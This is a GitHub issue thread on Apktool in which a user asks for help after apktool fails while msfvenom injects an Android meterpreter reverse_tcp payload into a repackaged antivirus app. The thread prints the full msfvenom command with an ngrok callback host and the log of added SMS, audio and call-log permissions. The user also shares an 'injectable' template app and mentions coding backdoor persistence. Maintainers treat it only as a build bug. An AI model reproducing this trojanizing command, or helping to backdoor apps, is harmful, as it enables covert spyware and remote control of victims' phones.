### ISSUE TITLE
[BUG] Simple apktool tool payload injection into certain applications

### ISSUE THREAD

**Issue by Rogue-Assassinak47** [iBotPeaches/Apktool#2481]
### Information
1. **Apktool v.2.5.0
2. **Kali Linux 2020
3. **APK From? https://apkpure.com/go-security%EF%BC%8Dantivirus-applock-booster/com.jb.security

### Stacktrace/Logcat

 msfvenom -x GoSecurityOriginal.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13935 -o test.apk

Using APK template: GoSecurityOriginal.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.jb.security.hiohq
[*] Loading /tmp/d20201217-11081-15gy9x2/original/smali/com/jb/security/application/GOApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20201217-11081-15gy9x2/output.apk

[-] I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
Error: Unable to rebuild apk with apktool

### Steps to Reproduce
1. I used msfvenom to inject the payload into a security apk 

### Frameworks

msfvenom

### APK

https://apkpure.com/go-security%EF%BC%8Dantivirus-applock-booster/com.jb.security

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything? no
2. If you are trying to install a modified apk, did you resign it? msfvenom runs the signing process
3. Are you using the latest apktool version? yes

I know that apktool has issues with certain apps because I can inject flappybird 2018 from apkpure.com just fine, so I know it works, also I can create payload apks just fine with no issues...any ideas?

**Comment by Rogue-Assassinak47** [comment]
Currently going through different apps on apkpure to see which ones work 

Download link to injectable apk 

https://apkpure.com/flappy-bird-2018/com.thunkable.android.anwar_ahmed_compassionate.FlappyBird/download?from=details

Just in case someone needs a template to work with \d(0.0)b/
                                                                                          |

**Comment by Surendrajat** [comment]
Actual logs from ApkTool:
Decoding:
```
java -jar /home/surendra/.apklab/apktool_2.5.0.jar d /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com.apk -o /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com
I: Using Apktool 2.5.0 on GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/surendra/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
Decoding process was successful
```
Rebuilding:
```
java -jar /home/surendra/.apklab/apktool_2.5.0.jar b /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com --use-aapt2
I: Using Apktool 2.5.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/gs.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h2.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h3.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h4.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h5.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h6.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h7.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h8.xml:4: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h8.xml:5: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/color/h8.xml:6: error: attribute alpha (aka com.jb.security:alpha) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/a5.xml:17: error: attribute card_item_height (aka com.jb.security:card_item_height) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/a5.xml:17: error: attribute card_item_margin (aka com.jb.security:card_item_margin) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/a_.xml:7: error: attribute matProg_barColor (aka com.jb.security:matProg_barColor) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/a_.xml:7: error: attribute matProg_barWidth (aka com.jb.security:matProg_barWidth) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/a_.xml:7: error: attribute matProg_progressIndeterminate (aka com.jb.security:matProg_progressIndeterminate) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/ae.xml:7: error: attribute matProg_barColor (aka com.jb.security:matProg_barColor) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/ae.xml:7: error: attribute matProg_barWidth (aka com.jb.security:matProg_barWidth) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/ae.xml:7: error: attribute matProg_progressIndeterminate (aka com.jb.security:matProg_progressIndeterminate) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/an.xml:2: error: attribute umanoDragView (aka com.jb.security:umanoDragView) not found.
W: /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/res/layout/an.xml:2: error: attribute umanoPanelHeight (aka com.jb.security:umanoPanelHeight) not found.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_33329343384506419908005041000038455559.tmp, link, -o, /tmp/APKTOOL8431265399690096118.tmp, --package-id, 127, --min-sdk-version, 16, --target-sdk-version, 26, --version-code, 165, --version-name, 1.66.9, --no-auto-version, --no-version-vectors, --no-version-transitions, --no-resource-deduping, -e, /tmp/APKTOOL9030011656508026300.tmp, -0, arsc, -I, /home/surendra/.local/share/apktool/framework/1.apk, --manifest, /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/AndroidManifest.xml, /tmp/GO Security－AntiVirus AppLock Booster_v1.66.9_apkpure.com/build/resources.zip]
Rebuilding process exited with code 1
```

**Comment by iBotPeaches** [comment]
This exact crash is what I fixed here - https://github.com/iBotPeaches/Apktool/pull/2440 so not sure at this time.

**Comment by Rogue-Assassinak47** [comment]
clean install fixed this for me I think the fat rat clone messes up apktool but no matter I can code back door persistence ty <3

**Comment by iBotPeaches** [comment]
Thanks for the update. Closing.
